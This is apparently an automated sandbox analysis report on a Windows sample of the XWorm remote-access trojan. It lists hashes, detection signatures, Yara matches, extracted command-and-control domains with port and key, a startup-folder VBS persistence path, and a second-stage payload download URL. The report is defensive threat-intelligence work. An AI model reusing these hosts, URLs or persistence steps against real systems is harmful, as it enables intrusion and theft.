Edit tour

Windows Analysis Report
Enquiry#039855.exe

Overview

General Information

Sample name:	Enquiry#039855.exe
Analysis ID:	1627137
MD5:	a69ad9d0fb5bdf7ea93dbfca99495d80
SHA1:	b3dc5cd3283982a73153e72ec76dd08060f40b8f
SHA256:	bad755124567617e4879874ad80ef2a54b6d6bb69c9da57f7073320d91759e37
Tags:	exeuser-abuse_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

HTTP GET or POST without a user agent

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

Enquiry#039855.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\Enquiry#039855.exe" MD5: A69AD9D0FB5BDF7EA93DBFCA99495D80)

Enquiry#039855.exe (PID: 4536 cmdline: "C:\Users\user\Desktop\Enquiry#039855.exe" MD5: A69AD9D0FB5BDF7EA93DBFCA99495D80)

WerFault.exe (PID: 1540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 920 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1802060515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e41:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b01:$cnc4: POST / HTTP/1.1
00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x23c8b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x23d28:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x23e3d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x23afd:$cnc4: POST / HTTP/1.1
00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12d014:$s8: Win32_ComputerSystem 0x143917:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1439b4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x143ac9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x143789:$cnc4: POST / HTTP/1.1
Process Memory Space: Enquiry#039855.exe PID: 5932	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Enquiry#039855.exe PID: 5932	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Enquiry#039855.exe PID: 5932	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Enquiry#039855.exe PID: 4536	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Enquiry#039855.exe.5f90000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Enquiry#039855.exe.5f90000.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Enquiry#039855.exe.2e4da88.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.Enquiry#039855.exe.2e4da88.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x493b:$str05: Select * from AntivirusProduct 0x4b39:$str06: PCRestart 0x4b4d:$str07: shutdown.exe /f /r /t 0 0x4bff:$str08: StopReport 0x4bd5:$str09: StopDDos 0x4cd7:$str10: sendPlugin 0x4d57:$str11: OfflineKeylogger Not Enabled 0x4ebd:$str12: -ExecutionPolicy Bypass -File " 0x4fe6:$str13: Content-length: 5235
0.2.Enquiry#039855.exe.2e4da88.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x508f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x512c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5241:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4f01:$cnc4: POST / HTTP/1.1
2.2.Enquiry#039855.exe.410000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.Enquiry#039855.exe.410000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x673b:$str05: Select * from AntivirusProduct 0x6939:$str06: PCRestart 0x694d:$str07: shutdown.exe /f /r /t 0 0x69ff:$str08: StopReport 0x69d5:$str09: StopDDos 0x6ad7:$str10: sendPlugin 0x6b57:$str11: OfflineKeylogger Not Enabled 0x6cbd:$str12: -ExecutionPolicy Bypass -File " 0x6de6:$str13: Content-length: 5235
2.2.Enquiry#039855.exe.410000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7041:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d01:$cnc4: POST / HTTP/1.1
0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x673b:$str05: Select * from AntivirusProduct 0x6939:$str06: PCRestart 0x694d:$str07: shutdown.exe /f /r /t 0 0x69ff:$str08: StopReport 0x69d5:$str09: StopDDos 0x6ad7:$str10: sendPlugin 0x6b57:$str11: OfflineKeylogger Not Enabled 0x6cbd:$str12: -ExecutionPolicy Bypass -File " 0x6de6:$str13: Content-length: 5235
0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e8f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7041:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d01:$cnc4: POST / HTTP/1.1
Click to see the 6 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Enquiry#039855.exe, ProcessId: 5932, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Enquiry#039855.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Sign.exe

Avira: detection malicious, Label: HEUR/AGEN.1308645

Found malware configuration

Source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["bin12.ydns.eu", "bin14.ydns.eu", "kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Sign.exe

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: Enquiry#039855.exe	Virustotal: Detection: 25%			Perma Link
Source: Enquiry#039855.exe	ReversingLabs: Detection: 23%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bin12.ydns.eu,bin14.ydns.eu,kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 4050
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String decryptor: DOGGY XWORM
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	String decryptor: USB.exe

Source: Enquiry#039855.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Enquiry#039855.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\Desktop\Enquiry#039855.PDB source: Enquiry#039855.exe, 00000002.00000002.2694036388.00000000005D9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000601000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D21000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1802245271.0000000006070000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D21000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1802245271.0000000006070000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\Enquiry#039855.PDB source: Enquiry#039855.exe, 00000002.00000002.2693782848.00000000001D8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: h>cHPJo,C:\Windows\System.pdb source: Enquiry#039855.exe, 00000002.00000002.2693782848.00000000001D8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbk source: Enquiry#039855.exe, 00000002.00000002.2694036388.000000000062B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbz source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000616000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000616000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb@ source: Enquiry#039855.exe, 00000002.00000002.2694036388.00000000005C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: Enquiry#039855.exe, 00000002.00000002.2693782848.00000000001D8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000601000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbof source: Enquiry#039855.exe, 00000002.00000002.2694036388.000000000062B000.00000004.00000020.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: bin12.ydns.eu
Source: Malware configuration extractor	URLs: bin14.ydns.eu
Source: Malware configuration extractor	URLs: kingsbkup1.ydns.eu
Source: Malware configuration extractor	URLs: smfcs1.ydns.eu
Source: Malware configuration extractor	URLs: smfcs3.ydns.eu

Source: global traffic

HTTP traffic detected: GET /never/lookinto/it/panel/uploads/Tnemxaef.vdf HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /never/lookinto/it/panel/uploads/Tnemxaef.vdf HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: win32.ydns.eu

Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu
Source: Enquiry#039855.exe, Sign.exe.0.dr	String found in binary or memory: http://win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf
Source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Enquiry#039855.exe.2e4da88.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Enquiry#039855.exe.2e4da88.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.Enquiry#039855.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.Enquiry#039855.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Enquiry#039855.exe

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Code function: 0_2_0130E3E8	0_2_0130E3E8
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Code function: 0_2_0130A890	0_2_0130A890
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Code function: 0_2_0130A880	0_2_0130A880
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Code function: 0_2_0130AE28	0_2_0130AE28
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Code function: 0_2_0130AE19	0_2_0130AE19
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Code function: 2_2_00870B93	2_2_00870B93

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 920

Source: Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1792617340.000000000106E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000003169000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1801318838.0000000005CF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameOxnojr.dll" vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000000.1448995348.00000000009A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDOGGY.exe, vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000000.00000002.1802245271.0000000006070000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Enquiry#039855.exe
Source: Enquiry#039855.exe, 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY XWORM.exe4 vs Enquiry#039855.exe
Source: Enquiry#039855.exe	Binary or memory string: OriginalFilenameDOGGY.exe, vs Enquiry#039855.exe

Source: Enquiry#039855.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Enquiry#039855.exe.2e4da88.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.Enquiry#039855.exe.2e4da88.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.Enquiry#039855.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.Enquiry#039855.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Enquiry#039855.exe, Tdtzopp.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Sign.exe.0.dr, Tdtzopp.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
